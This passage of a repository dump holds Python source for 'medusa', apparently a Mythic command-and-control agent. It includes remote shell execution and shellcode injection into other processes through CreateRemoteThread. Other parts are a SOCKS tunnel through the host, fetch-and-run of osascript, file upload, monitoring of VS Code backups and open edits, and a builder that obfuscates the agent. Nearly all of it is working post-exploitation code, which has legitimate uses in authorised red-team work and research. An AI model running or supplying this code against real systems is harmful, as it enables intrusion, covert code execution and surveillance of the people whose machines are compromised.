self.postMessageAndRetrieveResponse(data)\n        return json.dumps({ \"file_id\": initial_response[\"responses\"][0][\"file_id\"] })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/shell.py",
    "content": "    def shell(self, task_id, command):\n        import subprocess\n        process = subprocess.Popen(command, stdout=subprocess.PIPE, \n            stderr=subprocess.PIPE, cwd=self.current_directory, shell=True)\n        stdout, stderr = process.communicate()\n        out = stderr if stderr else stdout\n        return out.decode()\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/shinject.py",
    "content": "    def shinject(self, task_id, shellcode, process_id):\n        from ctypes import windll,c_int,byref,c_ulong\n        total_chunks = 1\n        chunk_num = 0\n        sc = b\"\"\n        while (chunk_num < total_chunks):\n            data = { \n                \"action\": \"post_response\", \"responses\": [{\n                    \"upload\": { \"chunk_size\": 51200, \"file_id\": shellcode, \"chunk_num\": chunk_num+1 },\n                    \"task_id\": task_id\n                }] \n            }\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            sc+=base64.b64decode(chunk[\"chunk_data\"])\n\n        PAGE_EXECUTE_READWRITE = 0x00000040\n        PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )\n        VIRTUAL_MEM  = ( 0x1000 | 0x2000 )\n\n        kernel32 = windll.kernel32\n        code_size = len(sc)\n        h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(process_id))\n\n        if not h_process:\n            return \"[!] Error: Couldn't acquire a handle to PID {}\".format(process_id)\n        arg_address = kernel32.VirtualAllocEx(h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)\n        kernel32.WriteProcessMemory(h_process, arg_address, sc, code_size, 0)\n        thread_id = c_ulong(0)\n        if not kernel32.CreateRemoteThread(h_process, None, 0, arg_address, None, 0, byref(thread_id)):\n            return \"[!] Failed to create thread.\"\n        return \"[*] Remote thread created.\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/sleep.py",
    "content": "    def sleep(self, task_id, seconds, jitter=-1):\n        self.agent_config[\"Sleep\"] = int(seconds)\n        if jitter != -1:\n            self.agent_config[\"Jitter\"] = int(jitter)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/socks.py2",
    "content": "    def socks(self, task_id, action, port):\n        import socket, select\n        from threading import Thread, active_count\n        from struct import pack, unpack\n        from Queue import Queue \n        \n        MAX_THREADS = 200\n        BUFSIZE = 2048\n        TIMEOUT_SOCKET = 5\n        OUTGOING_INTERFACE = \"\"\n\n        VER = b'\\x05'\n        M_NOAUTH = b'\\x00'\n        M_NOTAVAILABLE = b'\\xff'\n        CMD_CONNECT = b'\\x01'\n        ATYP_IPV4 = b'\\x01'\n        ATYP_DOMAINNAME = b'\\x03'\n\n        SOCKS_SLEEP_INTERVAL = 0.1\n        QUEUE_TIMOUT = 1\n\n        def sendSocksPacket(server_id, data, exit_value):\n            self.socks_out.put({ \"server_id\": server_id, \n                \"data\": base64.b64encode(data), \"exit\": exit_value })\n            \n        def create_socket():\n            try:\n                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                sock.settimeout(TIMEOUT_SOCKET)\n            except: return \"Failed to create socket: {}\".format(str(err))\n            return sock\n\n        def connect_to_dst(dst_addr, dst_port):\n            sock = create_socket()\n            if OUTGOING_INTERFACE:\n                try:\n                    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE)\n                except PermissionError as err: return 0\n            try:\n                sock.connect((str(dst_addr), int(dst_port)))\n                return sock\n            except socket.error as err: return 0\n\n        def request_client(msg):\n            try:\n                message = base64.b64decode(msg[\"data\"])\n                s5_request = bytearray(message[:BUFSIZE])\n            except:\n                return False\n            if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT or s5_request[2:3] != b'\\x00'):\n                return False\n            if s5_request[3:4] == ATYP_IPV4:\n                dst_addr = socket.inet_ntoa(s5_request[4:-2])\n                dst_port = unpack('>H', s5_request[8:len(s5_request)])[0]\n            elif s5_request[3:4] == ATYP_DOMAINNAME:\n                sz_domain_name = s5_request[4]\n                dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)]\n                port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)]\n                dst_port = unpack('>H', port_to_unpack)[0]\n            else: return False\n            return (dst_addr, dst_port)\n\n        def create_connection(msg):\n            dst = request_client(msg)\n            rep = b'\\x07'\n            bnd = b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00'\n            if dst: \n                socket_dst = connect_to_dst(dst[0], dst[1])\n            if not dst or socket_dst == 0: rep = b'\\x01'\n            else:\n                rep = b'\\x00'\n                bnd = socket.inet_aton(socket_dst.getsockname()[0])\n                bnd += pack(\">H\", socket_dst.getsockname()[1])\n            reply = VER + rep + b'\\x00' + ATYP_IPV4 + bnd\n            try: sendSocksPacket(msg[\"server_id\"], reply, msg[\"exit\"])                \n            except: return\n            if rep == b'\\x00': return socket_dst\n\n        def get_running_socks_thread():\n            return [ t for t in threading.enumerate() if \"socks:\" in t.name and not task_id in t.name ]\n\n        def a2m(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys(): return\n                try: reader, _, _ = select.select([socket_dst], [], [], 1)\n                except select.error as err: return\n\n                if not reader: continue\n                try:\n                    for sock in reader:\n                        data = sock.recv(BUFSIZE)\n                        if not data:\n                            sendSocksPacket(server_id, b\"\", True)\n                            socket_dst.close()\n                            return\n                        sendSocksPacket(server_id, data, False)\n                except Exception as e: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        def m2a(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys():\n                    socket_dst.close()\n                    return\n                try:\n                    if not self.socks_open[server_id].empty():\n                        socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT)))\n                except: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        t_socks = get_running_socks_thread()\n\n        if action == \"start\":\n            if len(t_socks) > 0: return \"[!] SOCKS Proxy already running.\"\n            self.sendTaskOutputUpdate(task_id, \"[*] SOCKS Proxy started.\\n\")\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"[*] SOCKS Proxy stopped.\"\n                if not self.socks_in.empty():\n                    packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT)\n                    if packet_json:\n                        server_id = packet_json[\"server_id\"]\n                        if server_id in self.socks_open.keys():\n                            if packet_json[\"data\"]: \n                                self.socks_open[server_id].put(packet_json[\"data\"])\n                            elif packet_json[\"exit\"]:\n                                self.socks_open.pop(server_id)\n                        else:\n                            if not packet_json[\"exit\"]:    \n                                if active_count() > MAX_THREADS:\n                                    sleep(3)\n                                    continue\n                                self.socks_open[server_id] = Queue()\n                                sock = create_connection(packet_json)\n                                if sock:\n                                    send_thread = Thread(target=a2m, args=(server_id, sock, ), name=\"A2M:{}\".format(server_id))\n                                    recv_thread = Thread(target=m2a, args=(server_id, sock, ), name=\"M2A:{}\".format(server_id))\n                                    send_thread.start()\n                                    recv_thread.start()\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n        else:\n            if len(t_socks) > 0:\n                for t_sock in t_socks:\n                    task = [task for task in self.taskings if task[\"task_id\"] == t_sock.name.split(\":\")[1]][0]\n                    task[\"stopped\"] = task[\"completed\"] = True\n                self.socks_open = {}\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/socks.py3",
    "content": "    def socks(self, task_id, action, port):\n        import socket, select, queue\n        from threading import Thread, active_count\n        from struct import pack, unpack\n        \n        MAX_THREADS = 200\n        BUFSIZE = 2048\n        TIMEOUT_SOCKET = 5\n        OUTGOING_INTERFACE = \"\"\n\n        VER = b'\\x05'\n        M_NOAUTH = b'\\x00'\n        M_NOTAVAILABLE = b'\\xff'\n        CMD_CONNECT = b'\\x01'\n        ATYP_IPV4 = b'\\x01'\n        ATYP_DOMAINNAME = b'\\x03'\n\n        SOCKS_SLEEP_INTERVAL = 0.1\n        QUEUE_TIMOUT = 1\n\n        def sendSocksPacket(server_id, data, exit_value):\n            self.socks_out.put({ \"server_id\": server_id, \n                \"data\": base64.b64encode(data).decode(), \"exit\": exit_value })\n            \n        def create_socket():\n            try:\n                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                sock.settimeout(TIMEOUT_SOCKET)\n            except: return \"Failed to create socket: {}\".format(str(err))\n            return sock\n\n        def connect_to_dst(dst_addr, dst_port):\n            sock = create_socket()\n            if OUTGOING_INTERFACE:\n                try:\n                    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE.encode())\n                except PermissionError as err: return 0\n            try:\n                sock.connect((dst_addr, dst_port))\n                return sock\n            except socket.error as err: return 0\n\n        def request_client(msg):\n            try:\n                message = base64.b64decode(msg[\"data\"])\n                s5_request = message[:BUFSIZE]\n            except:\n                return False\n            if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT or s5_request[2:3] != b'\\x00'):\n                return False\n            if s5_request[3:4] == ATYP_IPV4:\n                dst_addr = socket.inet_ntoa(s5_request[4:-2])\n                dst_port = unpack('>H', s5_request[8:len(s5_request)])[0]\n            elif s5_request[3:4] == ATYP_DOMAINNAME:\n                sz_domain_name = s5_request[4]\n                dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)]\n                port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)]\n                dst_port = unpack('>H', port_to_unpack)[0]\n            else: return False\n            return (dst_addr, dst_port)\n\n        def create_connection(msg):\n            dst = request_client(msg)\n            rep = b'\\x07'\n            bnd = b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00' + b'\\x00'\n            if dst: \n                socket_dst = connect_to_dst(dst[0], dst[1])\n            if not dst or socket_dst == 0: rep = b'\\x01'\n            else:\n                rep = b'\\x00'\n                bnd = socket.inet_aton(socket_dst.getsockname()[0])\n                bnd += pack(\">H\", socket_dst.getsockname()[1])\n            reply = VER + rep + b'\\x00' + ATYP_IPV4 + bnd\n            try: sendSocksPacket(msg[\"server_id\"], reply, msg[\"exit\"])                \n            except: return\n            if rep == b'\\x00': return socket_dst\n\n        def get_running_socks_thread():\n            return [ t for t in threading.enumerate() if \"socks:\" in t.name and not task_id in t.name ]\n\n        def a2m(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return\n                if server_id not in self.socks_open.keys(): return\n                try: reader, _, _ = select.select([socket_dst], [], [], 1)\n                except select.error as err: return\n\n                if not reader: continue\n                try:\n                    for sock in reader:\n                        data = sock.recv(BUFSIZE)\n                        if not data:\n                            sendSocksPacket(server_id, b\"\", True)\n                            socket_dst.close()\n                            return\n                        sendSocksPacket(server_id, data, False)\n                except Exception as e: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        def m2a(server_id, socket_dst):\n            while True:\n                if task_id not in [task[\"task_id\"] for task in self.taskings]: return\n                elif [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return                \n                if server_id not in self.socks_open.keys():\n                    socket_dst.close()\n                    return\n                try:\n                    if not self.socks_open[server_id].empty():\n                        socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT)))\n                except: pass\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n\n        t_socks = get_running_socks_thread()\n\n        if action == \"start\":\n            if len(t_socks) > 0: return \"[!] SOCKS Proxy already running.\"\n            self.sendTaskOutputUpdate(task_id, \"[*] SOCKS Proxy started.\\n\")\n            while True:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"[*] SOCKS Proxy stopped.\"\n                if not self.socks_in.empty():\n                    packet_json = self.socks_in.get(timeout=QUEUE_TIMOUT)\n                    if packet_json:\n                        server_id = packet_json[\"server_id\"]\n                        if server_id in self.socks_open.keys():\n                            if packet_json[\"data\"]: \n                                self.socks_open[server_id].put(packet_json[\"data\"])\n                            elif packet_json[\"exit\"]:\n                                self.socks_open.pop(server_id)\n                        else:\n                            if not packet_json[\"exit\"]:    \n                                if active_count() > MAX_THREADS:\n                                    sleep(3)\n                                    continue\n                                self.socks_open[server_id] = queue.Queue()\n                                sock = create_connection(packet_json)\n                                if sock:\n                                    send_thread = Thread(target=a2m, args=(server_id, sock, ), name=\"a2m:{}\".format(server_id))\n                                    recv_thread = Thread(target=m2a, args=(server_id, sock, ), name=\"m2a:{}\".format(server_id))\n                                    send_thread.start()\n                                    recv_thread.start()\n                time.sleep(SOCKS_SLEEP_INTERVAL)\n        else:\n            if len(t_socks) > 0:\n                for t_sock in t_socks:\n                    task = [task for task in self.taskings if task[\"task_id\"] == t_sock.name.split(\":\")[1]][0]\n                    task[\"stopped\"] = task[\"completed\"] = True\n                self.socks_open = {}\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/spawn_jxa.py",
    "content": "    def spawn_jxa(self, task_id, file, language):\n        import os\n        import subprocess\n        \n        total_chunks = 1\n        chunk_num = 0\n        cmd_code = \"\"\n        while (chunk_num < total_chunks):\n            if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                return \"Job stopped.\"\n            data = { \"action\": \"post_response\", \"responses\": [\n                    { \"upload\": { \"chunk_size\": CHUNK_SIZE, \"file_id\": file, \"chunk_num\": chunk_num+1 }, \"task_id\": task_id }\n                ]}\n            response = self.postMessageAndRetrieveResponse(data)\n            chunk = response[\"responses\"][0]\n            chunk_num+=1\n            total_chunks = chunk[\"total_chunks\"]\n            cmd_code += base64.b64decode(chunk[\"chunk_data\"]).decode()\n            \n        if cmd_code: \n            args = []\n            if language == \"JavaScript\":\n                args = [\"osascript\", \"-l\", \"JavaScript\", \"-\"]\n            elif language == \"AppleScript\":\n                args = [\"osascript\", \"-\"]\n\n            osapipe = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, \n                stderr=subprocess.PIPE)\n\n            osapipe.stdin.write(cmd_code.encode())\n            stdout, stderr = osapipe.communicate()\n            out = stderr if stderr else stdout\n            return str(out)\n        else: return \"Failed to load script\"\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/unload.py",
    "content": "    def unload(self, task_id, command):\n        try: getattr(medusa, command)\n        except: return \"{} not currently loaded.\".format(command)\n        delattr(medusa, command)\n        cmd_list = [{\"action\": \"remove\", \"cmd\": command}]\n        responses = [{ \"task_id\": task_id, \"user_output\": \"Unloaded command: {}\".format(command), \"commands\": cmd_list, \"completed\": True }]\n        message = { \"action\": \"post_response\", \"responses\": responses }\n        response_data = self.postMessageAndRetrieveResponse(message)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/unload_module.py",
    "content": "    def unload_module(self, task_id, module_name):\n        if module_name in self._meta_cache:\n            finder = self._meta_cache.pop(module_name)\n            sys.meta_path.remove(finder)\n            self.moduleRepo.pop(module_name)\n            return \"{} module unloaded\".format(module_name)\n        else: return \"{} not found in loaded modules\".format(module_name)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/upload.py",
    "content": "    def upload(self, task_id, file, remote_path):\n        total_chunks = 1\n        chunk_num = 1\n\n        file_path = remote_path if remote_path[0] == os.sep \\\n            else os.path.join(self.current_directory, remote_path)\n\n        with open(file_path, \"wb\") as f:\n            while chunk_num < total_chunks + 1:\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]:\n                    return \"Job stopped.\"\n\n                data = { \n                    \"action\": \"post_response\",\n                    \"responses\": [\n                        {\n                            \"upload\": {\n                                \"chunk_size\": CHUNK_SIZE,\n                                \"file_id\": file, \n                                \"chunk_num\": chunk_num,\n                                \"full_path\": file_path\n                            },\n                            \"task_id\": task_id\n                        }\n                    ] \n                }\n                response = self.postMessageAndRetrieveResponse(data)\n                chunk = response[\"responses\"][0]\n                chunk_num+=1\n                total_chunks = chunk[\"total_chunks\"]\n                f.write(base64.b64decode(chunk[\"chunk_data\"]))\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/vscode_list_recent.py",
    "content": "    def vscode_list_recent(self, task_id, db=\"\"):\n        import os, sqlite3, json\n        \n        path = db if db else \"/Users/{}/Library/Application Support/Code/User/globalStorage/state.vscdb\".format(os.environ[\"USER\"])\n        recent_files = []\n\n        if not os.path.exists(path):\n            return \"VSCode State database path does not exist!\"\n\n        with sqlite3.connect(path) as con:\n            for row in con.execute('SELECT * FROM \"ItemTable\" WHERE KEY = \"history.recentlyOpenedPathsList\"'):\n                data = json.loads(row[1])\n                for entry in data[\"entries\"]:\n                    recent_file = {}\n                    if \"folderUri\" in entry:\n                        recent_file[\"path\"] = entry[\"folderUri\"].replace(\"file://\", \"\")\n                        recent_file[\"type\"] = \"folder\"\n                    elif \"fileUri\" in entry:\n                        recent_file[\"path\"] = entry[\"fileUri\"].replace(\"file://\", \"\")\n                        recent_file[\"type\"] = \"file\"\n                    recent_files.append(recent_file)\n        return json.dumps({ \"recents\": recent_files })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/vscode_open_edits.py",
    "content": "    def vscode_open_edits(self, task_id, backups_path=\"\"):\n        import os, json\n        import time\n\n        path = backups_path if backups_path else \"/Users/{}/Library/Application Support/Code/Backups\".format(os.environ[\"USER\"])\n\n        if not os.path.exists(path):\n            return \"VSCode backups folder does not exist!\"\n\n        open_edits = []\n        for root, dirs, files in os.walk(path):\n            for file in files:\n                if file != \".DS_Store\" and file != \"workspaces.json\":\n                    open_edit = {}\n                    path = os.path.join(root, file)\n                    with open(path, \"r\") as f:\n                        file_content = f.readlines()\n                        json_data = json.loads(\"{\" + file_content[0].split(\"{\")[1].rstrip())\n                        if os.path.basename(root) == \"untitled\":\n                            open_edit[\"backup\"] = path\n                            open_edit[\"original\"] = file_content[0].split(\"{\")[0].replace(\"untitled:\",\"\").rstrip()\n                            open_edit[\"size\"] = \"\"\n                            open_edit[\"mtime\"] = \"\"\n                            open_edit[\"ctime\"] = \"\"\n                            open_edit[\"type\"] = \"New\"\n                        else:\n                            open_edit[\"backup\"] = path\n                            open_edit[\"original\"] = file_content[0].split(\"{\")[0].replace(\"file://\",\"\").rstrip()\n                            open_edit[\"size\"] = f\"{json_data['size']} B\"\n                            open_edit[\"mtime\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"mtime\"]/1000))\n                            open_edit[\"ctime\"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"ctime\"]/1000))\n                            open_edit[\"type\"] = \"Edit\"\n                    open_edits.append(open_edit)\n        return json.dumps({ \"edits\" : open_edits })\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/vscode_watch_edits.py",
    "content": "    def vscode_watch_edits(self, task_id, backups_path=\"\", seconds=1):\n        import hashlib, time, os, json\n\n        known_files = {}\n\n        def getOriginalFileDetails(path):\n            with open(path, \"r\") as f:\n                file_content = f.readlines()\n                json_data = json.loads(\"{\" + file_content[0].split(\"{\")[1].rstrip()) \n                return (\n                    file_content[0].split(\"{\")[0].replace(\"untitled:\",\"\").replace(\"file://\",\"\").rstrip(),\n                    json_data[\"size\"],\n                    time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(json_data[\"mtime\"]/1000))\n                )\n\n        def diffFolder(file_path, print_out=True):\n            for root, dirs, files in os.walk(file_path):\n                for dir in dirs:\n                    full_dir_path = os.path.join(root, dir)\n                    if full_dir_path not in known_files.keys():\n                        if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] New Directory: {}\".format(full_dir_path)\t)\n                        known_files[full_dir_path] = \"\"\n\n                for file in files:\n                    full_file_path = os.path.join(root, file)\n                    file_size = 0  \n                    try: \n                        with open(full_file_path, \"rb\") as in_f:\n                            file_data = in_f.read()\n                            file_size = len(file_data)\n                    except: continue \n\n                    hash = hashlib.md5(file_data).hexdigest()\n\n                    if full_file_path not in known_files.keys() and hash not in known_files.values():\n                        if print_out: \n                            original_file_path, size, modified_time = getOriginalFileDetails(full_file_path)\n                            self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] New File: \\n - Backup File: {} ({} bytes) \\n - Original File: {} ({} bytes) - Last Modified: {}\".format(\n                                full_file_path, file_size, original_file_path, size, modified_time))\n                        known_files[full_file_path] = hash\n                    \n                    elif full_file_path in known_files.keys() and hash not in known_files.values():\n                        if print_out: \n                            original_file_path, size, modified_time = getOriginalFileDetails(full_file_path)\n                            self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] File Updated: \\n - Backup File: {} ({} bytes) \\n - Original File: {} ({} bytes) - Last Modified: {}\".format(\n                                full_file_path, file_size, original_file_path, size, modified_time))\n\n                        known_files[full_file_path] = hash\n                    \n                    elif full_file_path not in known_files.keys() and hash in known_files.values():\n                        orig_file = [f for f,h in known_files.items() if h == hash][0]\n                        if os.path.exists(os.path.join(file_path, orig_file)):\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] Copied File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                        else:\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] Moved File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                            known_files.pop(orig_file)\n                    \n                    known_files[full_file_path] = hash\n            \n            for file in list(known_files):\n                if not os.path.isdir(os.path.dirname(file)):\n                    for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]:\n                        obj_type = \"Directory\" if not known_files[del_file] else \"File\"\n                        if file in list(known_files):\n                            if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] {} deleted: {} {}\".format(obj_type, \\\n                                del_file, \"({})\".format(known_files[del_file]) if known_files[del_file] else \"\"))\n                            known_files.pop(file)\n            \n                else:\n                    if os.path.basename(file) not in os.listdir(os.path.dirname(file)):\n                        obj_type = \"Directory\" if not known_files[file] else \"File\"\n                        if print_out: self.sendTaskOutputUpdate(task_id,\"\\n\\n[*] {} Deleted: {} {}\".format(obj_type, file, \\\n                            \"({})\".format(known_files[file]) if known_files[file] else \"\"))\n                        known_files.pop(file)\n\n        path = backups_path if backups_path else \"/Users/{}/Library/Application Support/Code/Backups\".format(os.environ[\"USER\"])\n\n        if not os.path.isdir(path):\n            return \"[!] Path must be a valid directory\"\n        elif not os.access(path, os.R_OK):\n            return \"[!] Path not accessible\"\n        else:\n            self.sendTaskOutputUpdate(task_id, \"[*] Starting directory watch for {}\".format(path))\n            diffFolder(path, False) \n            while(True):\n                if not os.path.exists(path):\n                    return  \"[!] Root directory has been deleted.\"\n                diffFolder(path)\n                time.sleep(seconds)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/watch_dir.py",
    "content": "    def watch_dir(self, task_id, path, seconds):\n        import hashlib\n        known_files = {}\n        def diffFolder(file_path, print_out=True):\n            for root, dirs, files in os.walk(file_path):\n                for dir in dirs:\n                    full_dir_path = os.path.join(root, dir)\n                    if full_dir_path not in known_files.keys():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] New Directory: {}\".format(full_dir_path)\t)\n                        known_files[full_dir_path] = \"\"\n\n                for file in files:\n                    full_file_path = os.path.join(root, file)\n                    file_size = 0  \n                    try: \n                        with open(full_file_path, \"rb\") as in_f:\n                            file_data = in_f.read()\n                            file_size = len(file_data)\n                    except: continue\n\n                    hash = hashlib.md5(file_data).hexdigest()\n\n                    if full_file_path not in known_files.keys() and hash not in known_files.values():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] New File: {} - {} bytes ({})\".format(full_file_path, file_size, hash))\n                        known_files[full_file_path] = hash\n                    elif full_file_path in known_files.keys() and hash not in known_files.values():\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] File Updated: {} - {} bytes ({})\".format(full_file_path, file_size, hash))\n                        known_files[full_file_path] = hash\n                    elif full_file_path not in known_files.keys() and hash in known_files.values():\n                        orig_file = [f for f,h in known_files.items() if h == hash][0]\n                        if os.path.exists(os.path.join(file_path, orig_file)):\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] Copied File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                        else:\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] Moved File: {}->{} - {} bytes ({})\".format(orig_file, full_file_path, file_size, hash))\n                            known_files.pop(orig_file)\n                    known_files[full_file_path] = hash\n            for file in list(known_files):\n                if not os.path.isdir(os.path.dirname(file)):\n                    for del_file in [f for f in list(known_files) if f.startswith(os.path.dirname(file))]:\n                        obj_type = \"Directory\" if not known_files[del_file] else \"File\"\n                        if file in list(known_files):\n                            if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] {} deleted: {} {}\".format(obj_type, \\\n                                del_file, \"({})\".format(known_files[del_file]) if known_files[del_file] else \"\"))\n                            known_files.pop(file)\n                else:\n                    if os.path.basename(file) not in os.listdir(os.path.dirname(file)):\n                        obj_type = \"Directory\" if not known_files[file] else \"File\"\n                        if print_out: self.sendTaskOutputUpdate(task_id, \"\\n[*] {} deleted: {} {}\".format(obj_type, file, \\\n                            \"({})\".format(known_files[file]) if known_files[file] else \"\"))\n                        known_files.pop(file)\n    \n        if path == \".\": file_path = self.current_directory\n        else: file_path = path if path[0] == os.sep \\\n                else os.path.join(self.current_directory,path)\n\n        if not os.path.isdir(file_path):\n            return \"[!] Path must be a valid directory\"\n        elif not os.access(file_path, os.R_OK):\n            return \"[!] Path not accessible\"\n        else:\n            self.sendTaskOutputUpdate(task_id, \"[*] Starting directory watch for {}\".format(path))\n            diffFolder(file_path, False) \n            while(True):\n                if [task for task in self.taskings if task[\"task_id\"] == task_id][0][\"stopped\"]: return \"Job stopped.\"\n                if not os.path.exists(file_path):\n                    return \"[!] Root directory has been deleted.\"\n                diffFolder(file_path)\n                time.sleep(seconds)\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/__init__.py",
    "content": "import glob\r\nimport os.path\r\nfrom pathlib import Path\r\nfrom importlib import import_module, invalidate_caches\r\nimport sys\r\n# Get file paths of all modules.\r\n\r\ncurrentPath = Path(__file__)\r\nsearchPath = currentPath.parent / \"agent_functions\" / \"*.py\"\r\nmodules = glob.glob(f\"{searchPath}\")\r\ninvalidate_caches()\r\nfor x in modules:\r\n    if not x.endswith(\"__init__.py\") and x[-3:] == \".py\":\r\n        module = import_module(f\"{__name__}.agent_functions.\" + Path(x).stem)\r\n        for el in dir(module):\r\n            if \"__\" not in el:\r\n                globals()[el] = getattr(module, el)\r\n\r\n\r\nsys.path.append(os.path.abspath(currentPath.name))"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/__init__.py",
    "content": ""
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/builder.py",
    "content": "from mythic_container.PayloadBuilder import *\nfrom mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\n\nimport asyncio, pathlib, os, tempfile, base64, hashlib, json, re\n\nfrom itertools import cycle\n\nclass Medusa(PayloadType):\n\n    name = \"medusa\"\n    file_extension = \"py\"\n    author = \"@ajpc500\"\n    supported_os = [\n        SupportedOS.Windows, SupportedOS.Linux, SupportedOS.MacOS\n    ]\n    wrapper = False\n    wrapped_payloads = [\"pickle_wrapper\"]\n    mythic_encrypts = True\n    note = \"This payload uses Python to create a simple agent\"\n    supports_dynamic_loading = True\n\n    c2_profiles = [\"http\", \"azure_blob\"]\n\n    build_parameters = [\n        BuildParameter(\n            name=\"output\",\n            parameter_type=BuildParameterType.ChooseOne,\n            description=\"Choose output format\",\n            choices=[\"py\", \"base64\"],\n            default_value=\"py\"\n        ),\n        BuildParameter(\n            name=\"python_version\",\n            parameter_type=BuildParameterType.ChooseOne,\n            description=\"Choose Python version\",\n            choices=[\"Python 3.8\", \"Python 2.7\"],\n            default_value=\"Python 3.8\"\n        ),\n        BuildParameter(\n            name=\"use_non_default_cryptography_lib\",\n            parameter_type=BuildParameterType.ChooseOne,\n            description=\"Use non-default 'cryptography' Python library for comms (if not, manual crypto will be used)\",\n            choices=[\"No\", \"Yes\"],\n            default_value=\"No\"\n        ),\n        BuildParameter(\n            name=\"obfuscate_script\",\n            parameter_type=BuildParameterType.ChooseOne,\n            description=\"XOR and Base64-encode agent code\",\n            choices=[\"Yes\", \"No\"],\n            default_value=\"Yes\"\n        ),\n        BuildParameter(\n            name=\"https_check\",\n            parameter_type=BuildParameterType.ChooseOne,\n            description=\"Verify HTTPS certificate (if HTTP, leave yes)\",\n            choices=[\"Yes\", \"No\"],\n            default_value=\"Yes\"\n        )\n    ]\n\n\n    agent_path = pathlib.Path(\".\") / \"medusa\" / \"mythic\"\n    agent_icon_path = agent_path / \"medusa.svg\"\n    agent_code_path = pathlib.Path(\".\") / \"medusa\" / \"agent_code\"\n\n    build_steps = [\n        BuildStep(step_name=\"Gathering Files\", step_description=\"Creating script payload\"),\n        BuildStep(step_name=\"Obfuscating Script\", step_description=\"Encoding and encrypting script content\")\n    ]\n\n    translation_container = None\n\n    def getPythonVersionFile(self, directory, file):\n        pyv = self.get_parameter(\"python_version\")\n        filename = \"\"\n        if 